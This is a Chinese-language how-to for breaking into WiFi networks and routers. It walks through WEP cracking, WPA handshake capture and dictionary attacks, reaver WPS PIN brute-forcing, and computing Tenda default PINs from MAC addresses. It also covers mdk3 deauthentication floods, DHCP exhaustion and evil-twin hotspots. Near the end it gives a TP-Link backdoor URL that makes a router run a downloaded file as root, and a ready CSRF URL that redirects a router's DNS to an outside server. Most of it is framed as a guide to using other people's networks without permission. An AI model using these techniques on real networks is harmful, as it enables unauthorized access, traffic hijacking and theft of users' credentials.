0x00 Wifi破解方式

---

WEP破解‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍

---

如果你的家用路由器的無線加密方式被配置為WEP加密，那麼你就得馬上進行修改了，因為由於WEP加密體制缺陷，蹭網者能夠透過收集足夠的握手包（即計算機與無線路由器連線認證過程中的資料包），使用分析密演算法還原出密碼。此類加密方式的攻擊成功率基本接近100%。比較常見的攻擊手法是使用MIDIWEP對周圍的無線訊號進行嗅探，當抓取到足夠多的IVS時就可以自動解出無線密碼，如下圖所示：

WPA/WPA2‍‍爆破‍‍‍‍‍‍‍‍‍‍

---

無線路由器的另一種加密方式為WPA/WPA2加密，相比較於WEP加密，暫時未能從一些公開的方法中找到直接破解WPA/WPA2密碼的方法，只能先抓獲握手包，然後對握手包進行暴力破解，但是結合著一些技巧以及普通使用者密碼策略比較薄弱，成功的機率也比較高。

抓握手包跑字典，這主要看你的字典給不給力了，拼人品的時間到了，和破解wep操作一樣的，選中訊號點lanch開始抓包，抓包的時候路由器是一定要有使用者使用，目的是攻擊導致對方掉線，在自動重連的過程中抓取WPA認證的四次握手包。如果一直沒找到線上的客戶端，就抓不到包的，只能等有人用的時候再試了。

彈出下面這個提示，說明抓包成功了，把包拷出來用EWSA驗證下是不是完整的握手包，要包含完整的四次握手資訊才能用來破解。

只有提示是有效的資料包才能進行字典破解，像下面這樣的資料包就是可以利用的。

接下來請出hashcat神器或者ewsa直接跑字典，(由於我的電腦配置不是很高 往往我選擇的是)直接丟到淘寶讓專業人士來跑

Pin碼窮舉攻擊(WPS‍‍破解)

---

大部分無線路由器都有個WPS快速連線的功能，只要連線的時候輸入路由器正確的pin管理碼，就可以自動的根據演算法協商金鑰連上WiFi。這個pin碼是8位純數字，前4位和後4位是分開驗證的，第8位是檢驗碼（根據前7位按照一定的演算法可以推出第8位）。也就是說如果要窮舉這個pin碼，只需要10^4+10^3=11000次，reaver就是幹這個差事的工具。只要路由器開啟了WPS功能，並且沒有鎖死WPS的機制，是百分百可以嘗試出正確的pin碼，得到pin碼後就能獲取到wpa密碼了。而且大部分情況下，路由器出廠開放WPS功能哦：）。不過要說明的是有些路由器，試錯pin碼多次會鎖死，這種情況下只能用第一種抓包跑密碼了。

點選掃描出現路由器MAC 名稱 等資訊 帶有WPS支援PIN碼破解，掃描出來帶有WPS路由器，點選Reaver進行PIN碼窮舉攻擊。如下圖

現已破解出PIN碼

進行連線

在框中輸入破解得到的pin碼。點選下一步，軟體會自動尋找路由，自動連線啦

騰達無線路由器PIN碼漏洞

---

騰達無線路由器MAC地址以“C83A35”或“00B00C”打頭的預設PIN碼,可以算出來

把計算器調為程式設計師型，選十六進位制，比如08:10:76:0F:B3:5C這個MAC地址，取後六位，輸入完後選十進位制就算出pin碼前7位了，第8位程式會自己補全。

計算得到的 就是路由的pin的前7位了，pin碼共由8位數字組成，前7位已經出來了，最後一位自己猜呀猜就出來了，猜出了就直接連線路由啦。

APP造成wifi密碼洩漏

---

用WiFi萬能鑰匙獲取WiFi密碼，前提是已經root的安卓手機。WiFi萬能鑰匙從伺服器獲取到別人分享的密碼來連線WiFi，斷開後就把密碼清除了。重點來了，WiFi在連線的過程中密碼是儲存在本機的/data/misc/wifi/wpa_supplicant.conf上的，我們可以強行終止WiFi萬能鑰匙程式，那密碼就永久儲存下來了，這時候用帶檔案管理器比如re或者es瀏覽器，開啟/data/misc/wifi/wpa_supplicant.conf就能看到密碼了。

或者裝個app吧，搜下WiFi連線管理器，長按顯示密碼就行了，都需要root許可權的。

0x01 WIFI攻擊

---

中間人攻擊

---

所謂中間人攻擊就是目標主機與另一主機進行正常連線的過程中，攻擊者透過攔截、插入、偽造、中斷資料包等方式，達到獲取對方登陸賬戶及密碼，偽造身份等目的。

手機端進行ARP攻擊

連線進入網路之後，使用dSploit掃描到的裝置列表與路由器管理介面中的一模一樣：

跳板攻擊

---

1. 基於軟體無線跳板攻擊

基於軟體的無線跳板攻擊是指在有線網路的基礎上，加入了無線網路的環節，透過配合使用有線網路內的主機、筆記本作為傳輸節點，一一連線起來進行無線訊號到有線網路的傳輸。

1. 基於硬體無線跳板攻擊

使用主機、無線路由器或者無線AP作為傳輸節點，並一一連線起來以便進行無線訊號的傳輸，也就是常說的無線中繼。

透過將多個無線AP中繼，將原本內部的無線網路訊號傳遞出來。

DHCP攻擊

---

利用DHCP的脆弱性發起的攻擊能夠迅速耗盡IP地址池，導致大面積的業務癱瘓，而且難以追蹤，危害性極大。

大量IP被佔用

DDOS攻擊

---

驗證洪水攻擊

和傳統的有線網路一樣，無線路由器也會面臨無線DOS攻擊的威脅

我們使用mdk3來測試驗證洪水攻擊。

我們可以看到mdk3偽造了大量的虛假客戶端去連線chinanet，MA地址也都是隨機偽造的。

取消驗證洪水攻擊

1. 客戶端與AP建立連線

2. 透過廣播插入偽造的取消身份驗證報文

3. 客戶端認為該報文來自AP

4. 已連線的客戶端自行斷開連線

這種攻擊不是針對AP的，而是針對於client的，當我們發動攻擊的時候我們可以馬上看到無法訪問網路了，見效很快。此時我們可以利用-s引數來加快發包速率。這種效率是非常高的，一般發動開始，client便開始斷網。

0x02 WIFI釣魚

---

被動式攻擊

---

建立虛假wifi熱點,等候別人的連線，安裝tcpdump等工具進行抓包竊取資料。

主動式攻擊

---

利用智慧手機 Wi-Fi 廣播 協議的缺陷 / 自動接入設計進行攻擊。

手機連線過WIFI熱點資訊之後會儲存在手機裡，每次進入無線覆蓋範圍就會自動接入。

公開WIFI熱點

 中國移動熱點：CMCC、CMCC-EDU 等

 中國聯通熱點：ChinaUnicom 等

 中國電信熱點：ChinaNet、ChinaTelecom 等

無線裝置為了加快連線速度，會對外廣播過它連線過什麼無線，ssid是多少。如果我截獲到了這個廣播，我自然能知道你連過什麼無線，把這個無線偽造出來

建立相同SSID 切沒有密碼的ap熱點，手機會主動連線手機裡已連線過的AP熱點，連線的時候只驗證SSID是否相同，當不存在密碼的時候，不用去驗證，會主動連線。(應該是安卓4.2以下版本可以)。

國產手機自帶的Wlan服務(刪都刪不掉)

將運營商的 Wi-Fi 熱點內建到你的手機中，更有甚者一些手機中這幾個 Wi-Fi 你都刪不掉，碰到了就連上，這樣的情況下 我們隨意建立一個類似於CMCC 等熱點就可以進行資訊竊取。

0x03 裝置攻防

---

TP-link後門

TP-LINK的某些型號的路由器存在一個後門功能，透過訪問某個無需授權認證的特定頁面，路由器會自動從攻擊者控制的TFTP伺服器上下載程式並執行。攻擊者利用這個漏洞可以在路由器上以root身份執行任意命令，從而可完全控制路由器。

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html ” ，路由器會從發起請求的機器透過tftp下載一個nart.out檔案，並以root許可權執行該檔案。

CSRF攻擊

 IE不支援Http Authentication  使用此方法在IE下攻擊是無效的 完美相容FF chrome。

http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=      192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5&dnsserver2=8.8.8.8&Save=%25B1%25A3+%25B4%25E6

烽火通訊某款路由器被爆存在漏洞-可遠端修改DNS

http://www.exploit-db.com/exploits/28450/

0x04 路由器攻破可以幹什麼？

---

網路出口流量控制在你手裡，手機端利用更新 系統漏洞掛馬？ PC端利用IE等漏洞來掛馬？ 竊取登入密碼等等。

控制路由器就等於控制80%以上的通訊資料包，利用方式和區域網嗅探、劫持大同小異。